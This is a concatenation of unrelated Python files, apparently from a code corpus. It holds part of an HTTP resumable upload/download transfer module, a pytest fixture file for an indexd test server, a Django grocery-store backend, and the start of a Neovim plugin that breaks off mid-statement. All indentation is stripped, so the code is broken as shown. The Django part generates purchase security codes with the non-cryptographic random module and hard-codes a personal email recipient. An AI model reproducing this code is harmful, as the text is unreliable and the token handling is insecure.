"""Compute the last byte to fetch for this request.
This is all based on the HTTP spec for Range and
Content-Range.
Note that this is potentially confusing in several ways:
* the value for the last byte is 0-based, eg "fetch 10 bytes
from the beginning" would return 9 here.
* if we have no information about size, and don't want to
use the chunksize, we'll return None.
See the tests for more examples.
Args:
start: byte to start at.
end: (int or None, default: None) Suggested last byte.
use_chunks: (bool, default: True) If False, ignore self.chunksize.
Returns:
Last byte to use in a Range header, or None.
"""
end_byte = end
if start < 0 and not self.total_size:
return end_byte
if use_chunks:
alternate = start + self.chunksize - 1
if end_byte is not None:
end_byte = min(end_byte, alternate)
else:
end_byte = alternate
if self.total_size:
alternate = self.total_size - 1
if end_byte is not None:
end_byte = min(end_byte, alternate)
else:
end_byte = alternate
return end_byte
def __GetChunk(self, start, end, additional_headers=None):
"""Retrieve a chunk, and return the full response."""
self.EnsureInitialized()
request = http_wrapper.Request(url=self.url)
self.__SetRangeHeader(request, start, end=end)
if additional_headers is not None:
request.headers.update(additional_headers)
return http_wrapper.MakeRequest(
self.bytes_http, request, retry_func=self.retry_func,
retries=self.num_retries)
def __ProcessResponse(self, response):
"""Process response (by updating self and writing to self.stream)."""
if response.status_code not in self._ACCEPTABLE_STATUSES:
# We distinguish errors that mean we made a mistake in setting
# up the transfer versus something we should attempt again.
if response.status_code in (http_client.FORBIDDEN,
http_client.NOT_FOUND):
raise exceptions.HttpError.FromResponse(response)
else:
raise exceptions.TransferRetryError(response.content)
if response.status_code in (http_client.OK,
http_client.PARTIAL_CONTENT):
self.stream.write(response.content)
self.__progress += response.length
if response.info and 'content-encoding' in response.info:
# TODO(craigcitro): Handle the case where this changes over a
# download.
self.__encoding = response.info['content-encoding']
elif response.status_code == http_client.NO_CONTENT:
# It's important to write something to the stream for the case
# of a 0-byte download to a file, as otherwise python won't
# create the file.
self.stream.write('')
return response
def GetRange(self, start, end=None, additional_headers=None,
use_chunks=True):
"""Retrieve a given byte range from this download, inclusive.
Range must be of one of these three forms:
* 0 <= start, end = None: Fetch from start to the end of the file.
* 0 <= start <= end: Fetch the bytes from start to end.
* start < 0, end = None: Fetch the last -start bytes of the file.
(These variations correspond to those described in the HTTP 1.1
protocol for range headers in RFC 2616, sec. 14.35.1.)
Args:
start: (int) Where to start fetching bytes. (See above.)
end: (int, optional) Where to stop fetching bytes. (See above.)
additional_headers: (bool, optional) Any additional headers to
pass with the request.
use_chunks: (bool, default: True) If False, ignore self.chunksize
and fetch this range in a single request.
Returns:
None. Streams bytes into self.stream.
"""
self.EnsureInitialized()
progress_end_normalized = False
if self.total_size is not None:
progress, end_byte = self.__NormalizeStartEnd(start, end)
progress_end_normalized = True
else:
progress = start
end_byte = end
while (not progress_end_normalized or end_byte is None or
progress <= end_byte):
end_byte = self.__ComputeEndByte(progress, end=end_byte,
use_chunks=use_chunks)
response = self.__GetChunk(progress, end_byte,
additional_headers=additional_headers)
if not progress_end_normalized:
self.__SetTotal(response.info)
progress, end_byte = self.__NormalizeStartEnd(start, end)
progress_end_normalized = True
response = self.__ProcessResponse(response)
progress += response.length
if response.length == 0:
raise exceptions.TransferRetryError(
'Zero bytes unexpectedly returned in download response')
def StreamInChunks(self, callback=None, finish_callback=None,
additional_headers=None):
"""Stream the entire download in chunks."""
self.StreamMedia(callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers,
use_chunks=True)
def StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None, use_chunks=True):
"""Stream the entire download.
Args:
callback: (default: None) Callback to call as each chunk is
completed.
finish_callback: (default: None) Callback to call when the
download is complete.
additional_headers: (default: None) Additional headers to
include in fetching bytes.
use_chunks: (bool, default: True) If False, ignore self.chunksize
and stream this download in a single request.
Returns:
None. Streams bytes into self.stream.
"""
callback = callback or self.progress_callback
finish_callback = finish_callback or self.finish_callback
self.EnsureInitialized()
while True:
if self.__initial_response is not None:
response = self.__initial_response
self.__initial_response = None
else:
end_byte = self.__ComputeEndByte(self.progress,
use_chunks=use_chunks)
response = self.__GetChunk(
self.progress, end_byte,
additional_headers=additional_headers)
if self.total_size is None:
self.__SetTotal(response.info)
response = self.__ProcessResponse(response)
self._ExecuteCallback(callback, response)
if (response.status_code == http_client.OK or
self.progress >= self.total_size):
break
self._ExecuteCallback(finish_callback, response)
class Upload(_Transfer):
"""Data for a single Upload.
Fields:
stream: The stream to upload.
mime_type: MIME type of the upload.
total_size: (optional) Total upload size for the stream.
close_stream: (default: False) Whether or not we should close the
stream when finished with the upload.
auto_transfer: (default: True) If True, stream all bytes as soon as
the upload is created.
"""
_REQUIRED_SERIALIZATION_KEYS = set((
'auto_transfer', 'mime_type', 'total_size', 'url'))
def __init__(self, stream, mime_type, total_size=None, http=None,
close_stream=False, chunksize=None, auto_transfer=True,
progress_callback=None, finish_callback=None,
**kwds):
super(Upload, self).__init__(
stream, close_stream=close_stream, chunksize=chunksize,
auto_transfer=auto_transfer, http=http, **kwds)
self.__complete = False
self.__final_response = None
self.__mime_type = mime_type
self.__progress = 0
self.__server_chunk_granularity = None
self.__strategy = None
self.__total_size = None
self.progress_callback = progress_callback
self.finish_callback = finish_callback
self.total_size = total_size
@property
def progress(self):
return self.__progress
@classmethod
def FromFile(cls, filename, mime_type=None, auto_transfer=True, **kwds):
"""Create a new Upload object from a filename."""
path = os.path.expanduser(filename)
if not os.path.exists(path):
raise exceptions.NotFoundError('Could not find file %s' % path)
if not mime_type:
mime_type, _ = mimetypes.guess_type(path)
if mime_type is None:
raise exceptions.InvalidUserInputError(
'Could not guess mime type for %s' % path)
size = os.stat(path).st_size
return cls(open(path, 'rb'), mime_type, total_size=size,
close_stream=True, auto_transfer=auto_transfer, **kwds)
@classmethod
def FromStream(cls, stream, mime_type, total_size=None, auto_transfer=True,
**kwds):
"""Create a new Upload object from a stream."""
if mime_type is None:
raise exceptions.InvalidUserInputError(
'No mime_type specified for stream')
return cls(stream, mime_type, total_size=total_size,
close_stream=False, auto_transfer=auto_transfer, **kwds)
@classmethod
def FromData(cls, stream, json_data, http, auto_transfer=None, **kwds):
"""Create a new Upload of stream from serialized json_data and http."""
info = json.loads(json_data)
missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys())
if missing_keys:
raise exceptions.InvalidDataError(
'Invalid serialization data, missing keys: %s' % (
', '.join(missing_keys)))
if 'total_size' in kwds:
raise exceptions.InvalidUserInputError(
'Cannot override total_size on serialized Upload')
upload = cls.FromStream(stream, info['mime_type'],
total_size=info.get('total_size'), **kwds)
if isinstance(stream, io.IOBase) and not stream.seekable():
raise exceptions.InvalidUserInputError(
'Cannot restart resumable upload on non-seekable stream')
if auto_transfer is not None:
upload.auto_transfer = auto_transfer
else:
upload.auto_transfer = info['auto_transfer']
upload.strategy = RESUMABLE_UPLOAD
upload._Initialize( # pylint: disable=protected-access
http, info['url'])
upload.RefreshResumableUploadState()
upload.EnsureInitialized()
if upload.auto_transfer:
upload.StreamInChunks()
return upload
@property
def serialization_data(self):
self.EnsureInitialized()
if self.strategy != RESUMABLE_UPLOAD:
raise exceptions.InvalidDataError(
'Serialization only supported for resumable uploads')
return {
'auto_transfer': self.auto_transfer,
'mime_type': self.mime_type,
'total_size': self.total_size,
'url': self.url,
}
@property
def complete(self):
return self.__complete
@property
def mime_type(self):
return self.__mime_type
def __str__(self):
if not self.initialized:
return 'Upload (uninitialized)'
else:
return 'Upload with %d/%s bytes transferred for url %s' % (
self.progress, self.total_size or '???', self.url)
@property
def strategy(self):
return self.__strategy
@strategy.setter
def strategy(self, value):
if value not in (SIMPLE_UPLOAD, RESUMABLE_UPLOAD):
raise exceptions.UserError((
'Invalid value "%s" for upload strategy, must be one of '
'"simple" or "resumable".') % value)
self.__strategy = value
@property
def total_size(self):
return self.__total_size
@total_size.setter
def total_size(self, value):
self.EnsureUninitialized()
self.__total_size = value
def __SetDefaultUploadStrategy(self, upload_config, http_request):
"""Determine and set the default upload strategy for this upload.
We generally prefer simple or multipart, unless we're forced to
use resumable. This happens when any of (1) the upload is too
large, (2) the simple endpoint doesn't support multipart requests
and we have metadata, or (3) there is no simple upload endpoint.
Args:
upload_config: Configuration for the upload endpoint.
http_request: The associated http request.
Returns:
None.
"""
if upload_config.resumable_path is None:
self.strategy = SIMPLE_UPLOAD
if self.strategy is not None:
return
strategy = SIMPLE_UPLOAD
if (self.total_size is not None and
self.total_size > _RESUMABLE_UPLOAD_THRESHOLD):
strategy = RESUMABLE_UPLOAD
if http_request.body and not upload_config.simple_multipart:
strategy = RESUMABLE_UPLOAD
if not upload_config.simple_path:
strategy = RESUMABLE_UPLOAD
self.strategy = strategy
def ConfigureRequest(self, upload_config, http_request, url_builder):
"""Configure the request and url for this upload."""
# Validate total_size vs. max_size
if (self.total_size and upload_config.max_size and
self.total_size > upload_config.max_size):
raise exceptions.InvalidUserInputError(
'Upload too big: %s larger than max size %s' % (
self.total_size, upload_config.max_size))
# Validate mime type
if not util.AcceptableMimeType(upload_config.accept, self.mime_type):
raise exceptions.InvalidUserInputError(
'MIME type %s does not match any accepted MIME ranges %s' % (
self.mime_type, upload_config.accept))
self.__SetDefaultUploadStrategy(upload_config, http_request)
if self.strategy == SIMPLE_UPLOAD:
url_builder.relative_path = upload_config.simple_path
if http_request.body:
url_builder.query_params['uploadType'] = 'multipart'
self.__ConfigureMultipartRequest(http_request)
else:
url_builder.query_params['uploadType'] = 'media'
self.__ConfigureMediaRequest(http_request)
else:
url_builder.relative_path = upload_config.resumable_path
url_builder.query_params['uploadType'] = 'resumable'
self.__ConfigureResumableRequest(http_request)
def __ConfigureMediaRequest(self, http_request):
"""Configure http_request as a simple request for this upload."""
http_request.headers['content-type'] = self.mime_type
http_request.body = self.stream.read()
http_request.loggable_body = '<media body>'
def __ConfigureMultipartRequest(self, http_request):
"""Configure http_request as a multipart request for this upload."""
# This is a multipart/related upload.
msg_root = mime_multipart.MIMEMultipart('related')
# msg_root should not write out its own headers
setattr(msg_root, '_write_headers', lambda self: None)
# attach the body as one part
msg = mime_nonmultipart.MIMENonMultipart(
*http_request.headers['content-type'].split('/'))
msg.set_payload(http_request.body)
msg_root.attach(msg)
# attach the media as the second part
msg = mime_nonmultipart.MIMENonMultipart(*self.mime_type.split('/'))
msg['Content-Transfer-Encoding'] = 'binary'
msg.set_payload(self.stream.read())
msg_root.attach(msg)
# NOTE: We encode the body, but can't use
# `email.message.Message.as_string` because it prepends
# `> ` to `From ` lines.
fp = six.BytesIO()
if six.PY3:
generator_class = email_generator.BytesGenerator
else:
generator_class = email_generator.Generator
g = generator_class(fp, mangle_from_=False)
g.flatten(msg_root, unixfrom=False)
http_request.body = fp.getvalue()
multipart_boundary = msg_root.get_boundary()
http_request.headers['content-type'] = (
'multipart/related; boundary=%r' % multipart_boundary)
if isinstance(multipart_boundary, six.text_type):
multipart_boundary = multipart_boundary.encode('ascii')
body_components = http_request.body.split(multipart_boundary)
headers, _, _ = body_components[-2].partition(b'\n\n')
body_components[-2] = b'\n\n'.join([headers, b'<media body>\n\n--'])
http_request.loggable_body = multipart_boundary.join(body_components)
def __ConfigureResumableRequest(self, http_request):
http_request.headers['X-Upload-Content-Type'] = self.mime_type
if self.total_size is not None:
http_request.headers[
'X-Upload-Content-Length'] = str(self.total_size)
def RefreshResumableUploadState(self):
"""Talk to the server and refresh the state of this resumable upload.
Returns:
Response if the upload is complete.
"""
if self.strategy != RESUMABLE_UPLOAD:
return
self.EnsureInitialized()
refresh_request = http_wrapper.Request(
url=self.url, http_method='PUT',
headers={'Content-Range': 'bytes */*'})
refresh_response = http_wrapper.MakeRequest(
self.http, refresh_request, redirections=0,
retries=self.num_retries)
range_header = self._GetRangeHeaderFromResponse(refresh_response)
if refresh_response.status_code in (http_client.OK,
http_client.CREATED):
self.__complete = True
self.__progress = self.total_size
self.stream.seek(self.progress)
# If we're finished, the refresh response will contain the metadata
# originally requested. Cache it so it can be returned in
# StreamInChunks.
self.__final_response = refresh_response
elif refresh_response.status_code == http_wrapper.RESUME_INCOMPLETE:
if range_header is None:
self.__progress = 0
else:
self.__progress = self.__GetLastByte(range_header) + 1
self.stream.seek(self.progress)
else:
raise exceptions.HttpError.FromResponse(refresh_response)
def _GetRangeHeaderFromResponse(self, response):
return response.info.get('Range', response.info.get('range'))
def InitializeUpload(self, http_request, http=None, client=None):
"""Initialize this upload from the given http_request."""
if self.strategy is None:
raise exceptions.UserError(
'No upload strategy set; did you call ConfigureRequest?')
if http is None and client is None:
raise exceptions.UserError('Must provide client or http.')
if self.strategy != RESUMABLE_UPLOAD:
return
http = http or client.http
if client is not None:
http_request.url = client.FinalizeTransferUrl(http_request.url)
self.EnsureUninitialized()
http_response = http_wrapper.MakeRequest(http, http_request,
retries=self.num_retries)
if http_response.status_code != http_client.OK:
raise exceptions.HttpError.FromResponse(http_response)
self.__server_chunk_granularity = http_response.info.get(
'X-Goog-Upload-Chunk-Granularity')
url = http_response.info['location']
if client is not None:
url = client.FinalizeTransferUrl(url)
self._Initialize(http, url)
# Unless the user has requested otherwise, we want to just
# go ahead and pump the bytes now.
if self.auto_transfer:
return self.StreamInChunks()
else:
return http_response
def __GetLastByte(self, range_header):
_, _, end = range_header.partition('-')
# TODO(craigcitro): Validate start == 0?
return int(end)
def __ValidateChunksize(self, chunksize=None):
if self.__server_chunk_granularity is None:
return
chunksize = chunksize or self.chunksize
if chunksize % self.__server_chunk_granularity:
raise exceptions.ConfigurationValueError(
'Server requires chunksize to be a multiple of %d',
self.__server_chunk_granularity)
def __StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None, use_chunks=True):
"""Helper function for StreamMedia / StreamInChunks."""
if self.strategy != RESUMABLE_UPLOAD:
raise exceptions.InvalidUserInputError(
'Cannot stream non-resumable upload')
callback = callback or self.progress_callback
finish_callback = finish_callback or self.finish_callback
# final_response is set if we resumed an already-completed upload.
response = self.__final_response
send_func = self.__SendChunk if use_chunks else self.__SendMediaBody
if use_chunks:
self.__ValidateChunksize(self.chunksize)
self.EnsureInitialized()
while not self.complete:
response = send_func(self.stream.tell(),
additional_headers=additional_headers)
if response.status_code in (http_client.OK, http_client.CREATED):
self.__complete = True
break
self.__progress = self.__GetLastByte(response.info['range'])
if self.progress + 1 != self.stream.tell():
# TODO(craigcitro): Add a better way to recover here.
raise exceptions.CommunicationError(
'Failed to transfer all bytes in chunk, upload paused at '
'byte %d' % self.progress)
self._ExecuteCallback(callback, response)
if self.__complete and hasattr(self.stream, 'seek'):
current_pos = self.stream.tell()
self.stream.seek(0, os.SEEK_END)
end_pos = self.stream.tell()
self.stream.seek(current_pos)
if current_pos != end_pos:
raise exceptions.TransferInvalidError(
'Upload complete with %s additional bytes left in stream' %
(int(end_pos) - int(current_pos)))
self._ExecuteCallback(finish_callback, response)
return response
def StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None):
"""Send this resumable upload in a single request.
Args:
callback: Progress callback function with inputs
(http_wrapper.Response, transfer.Upload)
finish_callback: Final callback function with inputs
(http_wrapper.Response, transfer.Upload)
additional_headers: Dict of headers to include with the upload
http_wrapper.Request.
Returns:
http_wrapper.Response of final response.
"""
return self.__StreamMedia(
callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers, use_chunks=False)
def StreamInChunks(self, callback=None, finish_callback=None,
additional_headers=None):
"""Send this (resumable) upload in chunks."""
return self.__StreamMedia(
callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers)
def __SendMediaRequest(self, request, end):
"""Request helper function for SendMediaBody & SendChunk."""
response = http_wrapper.MakeRequest(
self.bytes_http, request, retry_func=self.retry_func,
retries=self.num_retries)
if response.status_code not in (http_client.OK, http_client.CREATED,
http_wrapper.RESUME_INCOMPLETE):
# We want to reset our state to wherever the server left us
# before this failed request, and then raise.
self.RefreshResumableUploadState()
raise exceptions.HttpError.FromResponse(response)
if response.status_code == http_wrapper.RESUME_INCOMPLETE:
last_byte = self.__GetLastByte(
self._GetRangeHeaderFromResponse(response))
if last_byte + 1 != end:
self.stream.seek(last_byte)
return response
def __SendMediaBody(self, start, additional_headers=None):
"""Send the entire media stream in a single request."""
self.EnsureInitialized()
if self.total_size is None:
raise exceptions.TransferInvalidError(
'Total size must be known for SendMediaBody')
body_stream = stream_slice.StreamSlice(
self.stream, self.total_size - start)
request = http_wrapper.Request(url=self.url, http_method='PUT',
body=body_stream)
request.headers['Content-Type'] = self.mime_type
if start == self.total_size:
# End of an upload with 0 bytes left to send; just finalize.
range_string = 'bytes */%s' % self.total_size
else:
range_string = 'bytes %s-%s/%s' % (start, self.total_size - 1,
self.total_size)
request.headers['Content-Range'] = range_string
if additional_headers:
request.headers.update(additional_headers)
return self.__SendMediaRequest(request, self.total_size)
def __SendChunk(self, start, additional_headers=None):
"""Send the specified chunk."""
self.EnsureInitialized()
no_log_body = self.total_size is None
if self.total_size is None:
# For the streaming resumable case, we need to detect when
# we're at the end of the stream.
body_stream = buffered_stream.BufferedStream(
self.stream, start, self.chunksize)
end = body_stream.stream_end_position
if body_stream.stream_exhausted:
self.__total_size = end
# TODO: Here, change body_stream from a stream to a string object,
# which means reading a chunk into memory. This works around
# https://code.google.com/p/httplib2/issues/detail?id=176 which can
# cause httplib2 to skip bytes on 401's for file objects.
# Rework this solution to be more general.
# pylint: disable=redefined-variable-type
body_stream = body_stream.read(self.chunksize)
else:
end = min(start + self.chunksize, self.total_size)
body_stream = stream_slice.StreamSlice(self.stream, end - start)
# TODO(craigcitro): Think about clearer errors on "no data in
# stream".
request = http_wrapper.Request(url=self.url, http_method='PUT',
body=body_stream)
request.headers['Content-Type'] = self.mime_type
if no_log_body:
# Disable logging of streaming body.
# TODO: Remove no_log_body and rework as part of a larger logs
# refactor.
request.loggable_body = '<media body>'
if self.total_size is None:
# Streaming resumable upload case, unknown total size.
range_string = 'bytes %s-%s/*' % (start, end - 1)
elif end == start:
# End of an upload with 0 bytes left to send; just finalize.
range_string = 'bytes */%s' % self.total_size
else:
# Normal resumable upload case with known sizes.
range_string = 'bytes %s-%s/%s' % (start, end - 1, self.total_size)
request.headers['Content-Range'] = range_string
if additional_headers:
request.headers.update(additional_headers)
return self.__SendMediaRequest(request, end)
|
conftest.py
|
from multiprocessing import Process
import pytest
from .indexd_fixture import (
IndexClient,
MockServer,
create_user,
remove_sqlite_files,
run_indexd,
clear_database,
setup_database,
wait_for_indexd_alive,
wait_for_indexd_not_alive,
)
# Note the . in front of indexd_fixtures for more information:
# https://stackoverflow.com/questions/16981921/relative-imports-in-python-3#16985066
# Basically the options are:
# 1) Use setuptools for this repo
# 2) Some terrible looking relative imports
@pytest.fixture(scope="session")
def indexd_server():
"""
Starts the indexd server, and cleans up its mess.
Most tests will use the client which stems from this
server fixture.
Runs once per test session.
"""
port = 8001
indexd = Process(target=run_indexd, args=[port])
indexd.start()
wait_for_indexd_alive(port)
yield MockServer(port=port)
indexd.terminate()
wait_for_indexd_not_alive(port)
@pytest.fixture(scope="function")
def indexd_client(indexd_server):
"""
Returns a IndexClient. This will delete any documents,
aliases, or users made by this
client after the test has completed.
Currently the default user is the admin user
Runs once per test.
"""
setup_database()
client = IndexClient(
baseurl=indexd_server.baseurl, auth=create_user("admin", "admin")
)
yield client
clear_database()
|
backEnd.py
|
from django.contrib.auth.models import User
from maracay.models import Product, Profile, PurchaseConfirmation, Tools, purchaseHistory
from django.db import transaction
import json,random, string
from threading import Thread
from django.template.loader import render_to_string
from django.core.mail import send_mail
from django.conf import settings
from datetime import datetime, timedelta, date, time
import schedule, time, pytz, datetime
class backStart():
def __init__(self, request):
self._request = request
self.user = 0
self.response_data = {'error':[], 'data':[],'data2':[]}
self.code = 200
def get(self,params=None):
self.response_data['cantTotal']= Product.objects.all()
#self.response_data['first'] = self._request.GET.get('start',0)
#self.response_data['last'] = self._request.GET.get('end',12)
try:
for a in Product.objects.all():
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
'''for b in Product.objects.filter()[int(self._request.GET.get('start',0)):int(self._request.GET.get('end',12))]:
self.response_data['data2'].append({
"category":b.category,
"id":b.id,
"cant":b.cant,
"name":b.name,
"description":b.description,
"image":b.image,
#"price":b.price,
})'''
except Exception as e:
self.code = 500
return self.response_data['error'].append(str(e))
def guardaCompra(self):
def hilo2():
try:
print (self._request.POST)
########################codigo de seguridad de compra###################
def ran_gen(size, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
tokenCode = ran_gen(30,"abcdefghijkLmnNopqrstuvwxyz0123456789./*-")
########################################################################
carro = json.loads(self._request.POST['carrito'])
dataSave = {}
productId = 0
carroEmail = {'compra':[]}
for value in carro:
for k,v in value.items():
if k == 'id':
dataSave['product']=Product.objects.get(pk=int(v))
if k == 'cantidad':
dataSave['cant_product']=v
dataSave['start_date'] = self._request.POST['start_date']
dataSave['code'] = tokenCode
user = User.objects.get(email=self._request.user)
compras = PurchaseConfirmation.objects.create(
code=dataSave['code'],
user=user,
payment_type=self._request.POST['pago'],
confirmation=2,
product=dataSave['product'],
start_date=dataSave['start_date'],
cant_product=dataSave['cant_product'],
)
dataSave['product'].cant = dataSave['product'].cant - int(dataSave['cant_product'])
dataSave['product'].save()
compras.save()
dataSave = {}
productId = 0
#save historial################
historialCompras = purchaseHistory.objects.create(
code_purchase=tokenCode,
user=user,
total=''
)
historialCompras.save()
###############################
#Envio la factura por email
carroEmail = {'compra':[]}
allProducts = PurchaseConfirmation.objects.filter(code=compras.code)
totalGeneral=0
for value in allProducts:
carroEmail['compra'].append({
'image':value.product.image,
'name':value.product.name,
'price':str(value.product.price)+' / '+str(value.cant_product),
'total':float(value.product.price)*int(value.cant_product),
})
totalGeneral = totalGeneral+(float(value.product.price)*int(value.cant_product))
carroEmail['totalGeneral'] = totalGeneral
carroEmail['totalCompleto'] = carroEmail['totalGeneral']+Tools.objects.get(pk=1).costoenvio
msg_html = render_to_string('market/facturaCompra.html',
{
'asunto':'Factura' ,
'payment_type':self._request.POST['pago'],
'email':self._request.user,
'carro':carroEmail['compra'],
'totalGeneral':carroEmail['totalGeneral'],
'totalCompleto':carroEmail['totalCompleto'],
'codigo':tokenCode,
'costoEnvio':Tools.objects.get(pk=1).costoenvio,
})
send_mail(
'Title',
'Subject',
settings.EMAIL_HOST_USER,#from
['alfonsojn15@gmail.com'],#to
html_message=msg_html,
)
except Exception as e:
print (e)
self.code = 500
thread = Thread(target = hilo2)
thread.start()
def detailProducts(self):
print (self._request.user.id)
productos = PurchaseConfirmation.objects.filter(code=self._request.GET['code'])
totalGeneral=0
for value in productos:
totalGeneral = totalGeneral+(float(value.product.price)*int(value.cant_product))
self.response_data['data'].append({
'payment_type':value.payment_type,
'code':value.code,
'confirmation':value.confirmation,
'start_date':value.start_date,
'name':value.product.name,
'price':value.product.price,
'image':value.product.image,
'total':float(value.product.price)*int(value.cant_product),
'cant_product':value.cant_product,
})
totalCompleto = totalGeneral+Tools.objects.get(pk=1).costoenvio
self.response_data['data2'].append({
'totalGeneral':totalGeneral,
'totalCompleto':totalCompleto,
'direccion':Profile.objects.get(user=self._request.user.id).direction,
'costoenvio':Tools.objects.get(pk=1).costoenvio,
})
class profileBackend():
def __init__(self, request):
self._request = request
self.user = 0
self.response_data = {'error':[], 'data':[]}
self.code = 200
def post(self):
#creacion de Usuario
inssertDict = {}
inssertDictProfile = {}
if 'email' in self._request.POST:
inssertDict['email'] = self._request.POST['email']
inssertDict['username'] = self._request.POST['email']
else:
return self.response_data['error'].append("Error al crear Usuario/Sin email")
if 'name' in self._request.POST:
inssertDict['first_name']=self._request.POST['name']
if 'lastname' in self._request.POST:
inssertDict['last_name']=self._request.POST['lastname']
if 'password' in self._request.POST:
inssertDict['password'] = self._request.POST['password']
else:
return self.response_data['error'].append("Error al crear Usuario/Sin contraseña")
if 'phone' in self._request.POST:
inssertDictProfile['phone'] = self._request.POST['phone']
else:
return self.response_data['error'].append("Debe insertar un número célular")
if 'direction' in self._request.POST:
inssertDictProfile['direction'] = self._request.POST['direction']
else:
return self.response_data['error'].append("Debe insertar una Dirección")
if 'rif' in self._request.POST:
inssertDictProfile['rif'] = self._request.POST['rif']
else:
inssertDictProfile['rif'] = ''
if 'localphone' in self._request.POST:
inssertDictProfile['localphone'] = self._request.POST['localphone']
else:
inssertDictProfile['localphone'] = ''
if 'reference' in self._request.POST:
inssertDictProfile['reference'] = self._request.POST['reference']
else:
inssertDictProfile['reference'] = ''
try:
with transaction.atomic():
try:
getVerifiedUser = User.objects.get(username=inssertDict['username'])
self.code = 500
return self.response_data['error'].append("Ya este Email existe")
except Exception as e:
user = User.objects.create_user(**inssertDict)
inssertDictProfile['user'] = user
creteProfile = Profile(**inssertDictProfile)
creteProfile.save()
except Exception as e:
print (e)
self.code = 500
return self.response_data['error'].append("Error al crear Usuario"+str(e))
def accountData(self):
dataA = purchaseHistory.objects.all()
for a in dataA:
tabladecompra = PurchaseConfirmation.objects.filter(code=a.code_purchase).last()
self.response_data['data'].append({
"code_purchase":a.code_purchase,
"total":a.total,
"state":tabladecompra.confirmation,
"payment_type":tabladecompra.payment_type,
"start_date":tabladecompra.start_date-timedelta(hours=4),
})
class filterProducts():
def __init__(self, request):
self._request = request
self.user = 0
self.response_data = {'error':[], 'data':[]}
self.code = 200
def allProductsFilter(self):
self.response_data['cantTotal']= Product.objects.all()
for a in Product.objects.all():
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def viveresProductsFilter(self):
self.response_data['cantTotal']= Product.objects.filter(category=1)
for a in Product.objects.filter(category=1):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def frigorificoProductsFilter(self):
self.response_data['cantTotal']= Product.objects.filter(category=2)
for a in Product.objects.filter(category=2):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def enlatadosProductsFilter(self):
self.response_data['cantTotal']= Product.objects.filter(category=3)
for a in Product.objects.filter(category=3):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
class adminSite():
def __init__(self, request):
self._request = request
self.user = 0
self.response_data = {'error':[], 'data':[]}
self.code = 200
def dataProductUser(self):
self.response_data['cantTotal']= Product.objects.all()
for a in Product.objects.all():
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def viveresProductsFilterAdmin(self):
self.response_data['cantTotal']= Product.objects.filter(category=1)
for a in Product.objects.filter(category=1):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def frigorificoProductsFilterAdmin(self):
self.response_data['cantTotal']= Product.objects.filter(category=2)
for a in Product.objects.filter(category=2):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def enlatadosProductsFilterAdmin(self):
self.response_data['cantTotal']= Product.objects.filter(category=3)
for a in Product.objects.filter(category=3):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
|
__init__.py
|
import asyncio
import concurrent.futures
import difflib
import fnmatch
import functools
import glob
import importlib
from importlib.util import find_spec
import itertools
import multiprocessing
import os
from pathlib import Path
import pwd
import shutil
import threading
import time
if find_spec('pynvim'):
import pynvim as neovim
else:
import neovim
@neovim.plugin
class Wilder(object):
def __init__(self, nvim):
self.nvim = nvim
self.has_init = False
self.queue = multiprocessing.Queue()
self.events = []
self.lock = threading.Lock()
self.executor = None
self.cached_buffer = {'bufnr': -1, 'undotree_seq_cur': -1, 'buffer': []}
self.run_id = -1
def handle(self, ctx, x, command='resolve'):
self.nvim.call('wilder#' + command, ctx, x)
def echomsg(self, x):
self.nvim.session.threadsafe_call(lambda: self.nvim.command('echomsg "' + x + '"'))
def run_in_background(self, fn, args):
event = threading.Event()
ctx = args[0]
with self.lock:
if ctx['run_id'] < self.run_id:
return
self.run_id = ctx['run_id']
while len(self.events) > 0:
e = self.events.pop(0)
e.set()
self.events.append(event)
self.executor.submit(functools.partial( fn, *([event] + args), ))
def consumer(self):
while True:
args = self.queue.get()
ctx = args[0]
res = args[1]
while not self.queue.empty():
new_args = self.queue.get_nowait()
new_ctx = new_args[0]
if (new_ctx['run_id'] > ctx['run_id'] or
(new_ctx['run_id'] == ctx['run_id'] and new_ctx['step'] > ctx['step'])):
args = new_args
ctx = args[0]
res = args[1]
if len(args) > 2:
command = args[2]
self.nvim.async_call(self.handle, ctx, res, command=command)
else:
self.nvim.async_call(self.handle, ctx, res)
@neovim.function('_wilder_init', sync=True)
def init(self, args):
if self.has_init:
return
self.has_init = True
opts = args[0]
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=opts['num_workers'])
t = threading.Thread(target=self.consumer, daemon=True)
t.start()
@neovim.function('_wilder_python_sleep', sync=False, allow_nested=True)
def sleep(self, args):
self.run_in_background(self.sleep_handler, args)
def sleep_handler(self, event, ctx, t, x):
if event.is_set():
return
time.sleep(t)
self.queue.put((ctx, x,))
@neovim.function('_wilder_python_search', sync=False)
def search(self, args):
if args[2] == "":
self.handle(args[1], [])
return
bufnr = self.nvim.current.buffer.number
undotree_seq_cur = self.nvim.eval('undotree().seq_cur')
if (bufnr != self.cached_buffer['bufnr'] or
